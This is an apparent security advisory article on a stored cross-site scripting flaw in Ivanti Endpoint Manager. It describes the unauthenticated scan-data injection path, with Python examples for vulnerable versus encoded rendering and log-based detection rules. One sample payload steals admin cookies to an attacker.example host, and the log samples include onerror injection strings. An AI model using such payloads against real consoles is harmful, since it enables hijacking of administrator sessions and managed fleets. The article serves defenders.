
Critical Ivanti Endpoint Code Execution Flaw Exposes Admin

Figure: Visualization of the Ivanti Endpoint Manager CVE-2025-10573 flaw that allows attackers to hijack administrator sessions through stored XSS.

A newly disclosed Ivanti Endpoint Manager flaw, tracked as CVE-2025-10573, turns the product’s web dashboard into a high-value target. The issue lets an unauthenticated attacker plant malicious JavaScript in data that the management interface later renders; once an administrator opens the affected dashboard view, that script runs inside the administrator’s authenticated browser session. Although widely described as a code execution flaw, the bug is a stored cross-site scripting issue: the code that executes is attacker-supplied JavaScript in the admin’s browser, not native code on the EPM server. For organizations that rely on Ivanti EPM to control Windows, macOS, Linux, ChromeOS, and even IoT endpoints, a hijacked admin session is effectively a shortcut to the entire managed estate.

The vulnerability affects Ivanti Endpoint Manager instances running versions prior to EPM 2024 SU4 SR1. Those builds remain common in production, especially where change control is slow or where patching Ivanti infrastructure competes with other priorities.

How CVE-2025-10573 leads to code execution

At its core, CVE-2025-10573 is a stored cross-site scripting vulnerability in the Ivanti EPM web service. Instead of targeting end users through a traditional phishing page, the attacker abuses the way EPM ingests device scan data.

The product exposes an unauthenticated web endpoint that accepts inventory information from managed endpoints. An attacker can craft fake “devices” and submit scan data that embeds malicious JavaScript inside key fields. EPM then parses that data, stores it, and later renders it inside the administrator’s web dashboard.

From the attacker’s perspective, this is ideal. They do not need valid credentials, and they do not need network-level access to the management console beyond the exposed web service. Once the malicious data lands in the EPM database, it sits there until an administrator opens one of the poisoned dashboard views as part of normal work.

When that happens, the dashboard inserts the stored value into the page without HTML-encoding it, so the browser parses the payload as markup and script rather than as plain text. The result is client-side JavaScript execution in the context of the admin’s authenticated session. With that control, an attacker can perform privileged actions on behalf of the administrator, including pushing software, changing policies, or pivoting into other systems tied to Ivanti Endpoint Manager.

From the admin’s point of view, the only “user interaction” required is viewing a familiar dashboard page. That makes this Ivanti Endpoint Manager code execution flaw particularly dangerous inside busy operations teams.
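The mechanism described above, as an added example that is not Ivanti’s code and does not reproduce EPM’s real schema or endpoint: a minimal inventory store accepts a constructed “scan” whose device name carries an event-handler payload, a vulnerable renderer interpolates the stored field straight into HTML, and a hardened renderer applies output encoding at render time. The field names, the payload and the response headers are assumptions for illustration.

```python
import html
import re

# Constructed sample data: two "scans" standing in for submissions to the
# unauthenticated ingestion endpoint. Field names are assumptions for
# illustration, not the product's real schema.
MALICIOUS_SCAN = {
    "device_name": 'WS-4711<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">',
    "os_version": "Windows 11 23H2",
    "last_user": "j.doe",
}
BENIGN_SCAN = {
    "device_name": "WS-0001",
    "os_version": "Windows 11 23H2",
    "last_user": "a.smith",
}

FIELDS = ("device_name", "os_version", "last_user")


def ingest_scan(inventory: list, scan: dict) -> None:
    """Ingestion path: nothing is validated, the record is stored as sent.
    Storing arbitrary strings is not itself the bug; the bug is a renderer
    that later emits them without encoding for the output context."""
    inventory.append({k: str(scan.get(k, "")) for k in FIELDS})


def render_vulnerable(inventory: list) -> str:
    """Dashboard view that interpolates stored fields straight into HTML.
    The browser cannot distinguish attacker data from page markup, so the
    <img onerror=...> inside the device name becomes a live event handler."""
    rows = "".join(
        f'<tr><td title="{d["device_name"]}">{d["device_name"]}</td>'
        f'<td>{d["os_version"]}</td><td>{d["last_user"]}</td></tr>'
        for d in inventory
    )
    return f"<table>{rows}</table>"


def render_hardened(inventory: list) -> str:
    """Same view with output encoding applied at the point of rendering.
    html.escape(quote=True) neutralises <, >, &, " and ', so the value is
    safe both as element text and inside a double-quoted attribute."""
    rows = "".join(
        '<tr><td title="{n}">{n}</td><td>{o}</td><td>{u}</td></tr>'.format(
            n=html.escape(d["device_name"], quote=True),
            o=html.escape(d["os_version"], quote=True),
            u=html.escape(d["last_user"], quote=True),
        )
        for d in inventory
    )
    return f"<table>{rows}</table>"


# Defence in depth for dashboard responses (assumed values): a CSP that
# forbids inline script blocks the onerror= handler even if an encoding
# bug slips through in one template.
HARDENED_RESPONSE_HEADERS = {
    "Content-Security-Policy": "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'",
    "X-Content-Type-Options": "nosniff",
}

_TAG_RE = re.compile(r"<([a-zA-Z][a-zA-Z0-9]*)")


def element_names(markup: str) -> set:
    """Return the set of element names a browser would parse from markup.
    Shows that the hardened renderer emits only the elements the template
    author wrote, while the vulnerable one also emits the injected <img>."""
    return {m.group(1).lower() for m in _TAG_RE.finditer(markup)}


if __name__ == "__main__":
    inventory = []
    ingest_scan(inventory, BENIGN_SCAN)
    ingest_scan(inventory, MALICIOUS_SCAN)
    print("vulnerable:", sorted(element_names(render_vulnerable(inventory))))
    print("hardened:  ", sorted(element_names(render_hardened(inventory))))
```

The point to take from the hardened version is where the fix lives: encoding happens in the renderer, for the specific HTML context, not by filtering on ingest. Input filtering can be bypassed or reverted by a later feature, whereas a template that always encodes, backed by a CSP that disallows inline handlers, fails closed.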

Why internet-exposed EPM servers increase the risk

Ivanti’s guidance stresses that Endpoint Manager cores are not designed to sit directly on the public internet. In many environments, though, legacy deployment choices and convenience have led to exactly that. Threat monitoring data has already shown hundreds of Ivanti EPM instances listening on public IP addresses, with a significant concentration in the United States, Germany, and Japan.

An internet-facing EPM server reduces the attacker’s barrier to entry. Instead of pivoting from an internal foothold, they can probe the exposed management interface directly and attempt to submit crafted device scans from anywhere. Even when internal-only, EPM remains a high-value target for insiders or for attackers that have already landed elsewhere in the network.

Organizations that still expose their EPM consoles to the internet should treat this as a priority architecture issue. A stored XSS path that hands an adversary the administrative dashboard gives far more leverage than a typical endpoint infection, because the admin session is the key to every managed device.

Additional Ivanti Endpoint Manager vulnerabilities in play

CVE-2025-10573 sits on top of a broader history of serious weaknesses in Ivanti Endpoint Manager servers. Over the last two years, multiple flaws in EPM cores have allowed attackers to perform remote code execution or SQL injection against management servers. Some of those vulnerabilities, such as the SQL injection tracked as CVE-2024-29824, have been added to the CISA Known Exploited Vulnerabilities catalog after active abuse in the wild.

The pattern matters. Attackers already understand how much power they gain by compromising EPM infrastructure. Previous campaigns against Ivanti appliances show they are willing to invest in discovery, exploitation, and persistence on these platforms. A new critical stored XSS issue adds another tool to that playbook, particularly for adversaries that prefer stealthy session hijacking and living-off-the-land techniques.

For defenders, that history means the Ivanti Endpoint Manager code execution flaw is not an isolated one-off. It is part of a trend that should push security teams to reassess how they design, patch, and monitor management infrastructure as a category, not just Ivanti products alone.

Detection opportunities around this attack path

Although the vulnerability abuses normal product behavior, it does leave traces. Well-instrumented environments have several ways to spot suspicious activity.

On the network side, defenders can monitor for anomalous POST requests to the EPM device scan endpoint, especially from hosts that are not managed agents or from unusual IP ranges. Submissions that carry HTML or JavaScript constructs in fields that normally hold inventory data, such as angle brackets, event-handler attributes like onerror=, javascript: URLs, or HTML entity encoding, are worth investigating.

On the server, logs tied to device ingestion, dashboard rendering, and session management may show correlations between new “devices” and sudden admin actions. If an attacker hijacks a browser session, you might see legitimate admin credentials performing actions from unusual IP addresses, user agents, or time windows that do not match the operator’s normal routine.

On the endpoint side, EPM’s own ability to push software and scripts becomes a detection vector. If the console suddenly starts deploying tools, remote shells, or unauthorized agents, that should trigger alerts in both EDR and centralized logging. Building specific detections for suspicious EPM actions, such as mass script execution outside maintenance windows, can help catch abuse early.
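The three detection opportunities above, as an added example that is not Ivanti’s code and does not use EPM’s real log format: three rules run over constructed JSON-lines events for the ingestion endpoint, the console audit trail, and the task log. The endpoint path, field names, address ranges, maintenance window and every log line are assumptions made for illustration.

```python
import json
import re
from collections import defaultdict
from datetime import datetime, time

# Assumed environment facts for the rules below (not EPM defaults).
MANAGED_AGENT_NETS = ("10.20.",)                # where genuine EPM agents live
SCAN_ENDPOINT = "/inventory/scan"              # placeholder for the ingestion path
MAINTENANCE_WINDOW = (time(1, 0), time(5, 0))   # 01:00-05:00, when mass tasks are expected

# Constructed web-server access events for the ingestion endpoint.
ACCESS_LOG = r"""
{"ts":"2025-11-03T09:12:01","src":"10.20.4.17","method":"POST","path":"/inventory/scan","body":{"device_name":"WS-0001","os_version":"Windows 11 23H2"}}
{"ts":"2025-11-03T09:13:44","src":"203.0.113.9","method":"POST","path":"/inventory/scan","body":{"device_name":"WS-4711<img src=x onerror=alert(1)>","os_version":"Windows 11 23H2"}}
{"ts":"2025-11-03T09:13:59","src":"10.20.4.18","method":"POST","path":"/inventory/scan","body":{"device_name":"WS-0002","last_user":"a.smith\" onmouseover=\"alert(1)"}}
{"ts":"2025-11-03T09:14:02","src":"10.0.5.5","method":"GET","path":"/dashboard","body":{}}
""".strip().splitlines()

# Constructed console audit events: the same admin session shows up from a
# second source address and user agent, the signature of a replayed cookie.
AUDIT_LOG = """
{"ts":"2025-11-03T09:20:11","user":"epmadmin","session":"S-1","src":"10.0.5.5","ua":"Mozilla/5.0 (Windows NT 10.0) Chrome/130","action":"view_dashboard"}
{"ts":"2025-11-03T09:20:15","user":"epmadmin","session":"S-1","src":"203.0.113.9","ua":"python-requests/2.32","action":"create_task"}
{"ts":"2025-11-03T09:25:00","user":"epmadmin","session":"S-2","src":"10.0.5.5","ua":"Mozilla/5.0 (Windows NT 10.0) Chrome/130","action":"view_dashboard"}
""".strip().splitlines()

# Constructed task events: one routine deployment inside the window, one
# script push to hundreds of hosts during the working day.
TASK_LOG = """
{"ts":"2025-11-03T02:10:00","user":"epmadmin","task":"deploy","targets":120,"payload":"monthly-patch-bundle.msu"}
{"ts":"2025-11-03T09:20:15","user":"epmadmin","task":"run_script","targets":350,"payload":"agent.ps1"}
""".strip().splitlines()

# Markup and script constructs that have no business in inventory fields.
# Deliberately broad; tune against real inventory data to limit noise
# (for example a field legitimately named "onboard=" would trip it).
XSS_MARKERS = re.compile(r"<\s*/?[a-z]|\bon[a-z]+\s*=|javascript:|&#x?[0-9a-f]+;", re.I)


def parse_jsonl(lines):
    return [json.loads(line) for line in lines if line.strip()]


def suspicious_scan_submissions(access_lines):
    """Rule 1: POSTs to the ingestion endpoint from outside the agent
    networks, or carrying script-like content in inventory fields. Both
    conditions are checked because a compromised internal host can submit
    a poisoned scan from an expected address."""
    findings = []
    for ev in parse_jsonl(access_lines):
        if ev["method"] != "POST" or ev["path"] != SCAN_ENDPOINT:
            continue
        reasons = []
        if not ev["src"].startswith(MANAGED_AGENT_NETS):
            reasons.append("source not in managed agent networks")
        tainted = [k for k, v in ev.get("body", {}).items()
                   if isinstance(v, str) and XSS_MARKERS.search(v)]
        if tainted:
            reasons.append("script-like content in " + ",".join(tainted))
        if reasons:
            findings.append({"ts": ev["ts"], "src": ev["src"], "reasons": reasons})
    return findings


def reused_sessions(audit_lines):
    """Rule 2: one session ID observed from more than one (source, user
    agent) pair. A stolen and replayed cookie looks like this; script that
    drives the console from inside the victim's own browser does not, which
    is why rule 3 watches what the console actually does."""
    origins, users = defaultdict(set), {}
    for ev in parse_jsonl(audit_lines):
        origins[ev["session"]].add((ev["src"], ev["ua"]))
        users[ev["session"]] = ev["user"]
    return [{"session": s, "user": users[s], "origins": sorted(o)}
            for s, o in origins.items() if len(o) > 1]


def risky_tasks(task_lines, max_targets=200):
    """Rule 3: script execution or large deployments created outside the
    maintenance window, regardless of which session created them."""
    start, end = MAINTENANCE_WINDOW
    findings = []
    for ev in parse_jsonl(task_lines):
        t = datetime.fromisoformat(ev["ts"]).time()
        in_window = start <= t <= end
        if not in_window and (ev["task"] == "run_script" or ev["targets"] > max_targets):
            findings.append({"ts": ev["ts"], "task": ev["task"],
                             "targets": ev["targets"], "payload": ev["payload"]})
    return findings


if __name__ == "__main__":
    for rule in (suspicious_scan_submissions(ACCESS_LOG),
                 reused_sessions(AUDIT_LOG),
                 risky_tasks(TASK_LOG)):
        for f in rule:
            print(f)
```

Rule 1 fires twice on the sample: once for the external submitter, and once for the internal host whose last_user field breaks out of an attribute, which is the case a source-address allowlist alone would miss. Rule 2 catches the replayed session S-1; rule 3 catches the daytime run_script task even though it was created by the legitimate admin account.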

Patching and hardening Ivanti Endpoint Manager

Mitigation starts with patching. Ivanti has released EPM 2024 SU4 SR1 to remediate CVE-2025-10573. Any environment running older builds should plan an accelerated upgrade, especially where EPM consoles are reachable from semi-trusted or untrusted networks.

A practical approach combines several steps:

• First, inventory all Ivanti Endpoint Manager instances, including lab environments and regional cores that might have been forgotten.
• Second, verify which ones are exposed to the internet through direct access or through reverse proxies and VPN portals. Those should be prioritized for immediate patching or isolation.
• Third, review access control around the EPM web console. Restrict exposure to administrative networks, enforce strong MFA, and ensure only specific jump-hosts or management workstations can reach the interface.

Beyond patching, hardening should focus on reducing the impact of any future flaw. That includes segmenting management servers away from general user networks, ensuring backups of EPM infrastructure are both recent and tested, and monitoring for configuration drift that re-exposes services you thought were internal only.

Given Ivanti’s history of impactful bugs, teams should fold EPM into existing vulnerability management runbooks rather than treating it as a “set and forget” tool.

Strategic lessons for defenders

This incident reinforces several strategic points for defenders who rely on unified endpoint management platforms.

First, management tiers are often the most powerful part of your environment but receive the least security scrutiny. A compromise of Ivanti Endpoint Manager or a similar product has far more blast radius than a single workstation infection. The Ivanti Endpoint Manager code execution flaw shows how even a seemingly “just XSS” issue can convert into full administrative control.

Second, “not intended to be internet-facing” is not a control. If a product vendor writes that in a security advisory, it usually means there are customers running it that way in production. Security teams should assume misconfigurations exist and actively search for exposed management interfaces, not just trust design diagrams.

Third, attackers keep track of vendor ecosystems. Once a platform like Ivanti EPM becomes a proven gateway into high-value environments, new vulnerabilities in that platform automatically gain more attention from capable threat actors. That reality should influence patching priority, threat modeling, and how quickly organizations move away from risky default architectures.

Finally, this case is another reminder that application-layer vulnerabilities, especially those tied to complex management products, rarely live in isolation. Defenders should pursue layered defenses: network segmentation, strict access control, robust logging, and dedicated detection logic around powerful administrative tools. When those layers work together, even a critical web vulnerability has less chance of turning into a full-scale compromise.
